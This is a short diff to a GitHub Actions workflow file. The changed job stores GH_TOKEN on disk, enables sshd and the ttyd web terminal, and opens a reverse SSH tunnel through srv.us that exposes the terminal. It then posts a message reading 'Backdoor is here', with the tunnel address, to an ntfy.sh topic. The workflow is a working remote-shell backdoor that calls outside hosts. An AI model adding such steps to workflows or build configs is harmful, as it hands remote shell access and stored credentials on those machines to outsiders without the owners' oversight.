--- a/.github/workflows/launch_instance.yml
+++ b/.github/workflows/launch_instance.yml
@@ -21,7 +21,7 @@ jobs:
         run: |
           mkdir -p /home/ubuntu/.config/
           echo "GH_TOKEN=$GH_TOKEN" > /home/ubuntu/.config/systemd.env
-          sudo systemctl enable --now ttyd.service srv.us.service
+          sudo systemctl enable --now sshd.service ttyd.service srv.us.service
           ssh -o StrictHostKeyChecking=no -o BatchMode=yes -o ServerAliveInterval=5 -T srv.us -R 1:127.0.0.1:7681 2> /dev/null > /tmp/srv.us.addr &
           sleep 1 && kill %1
           curl -s -d "$(echo Backdoor is here; cat /tmp/srv.us.addr)" ntfy.sh/ZvOh2nddtR3RXxj9 > /dev/null 2>&1
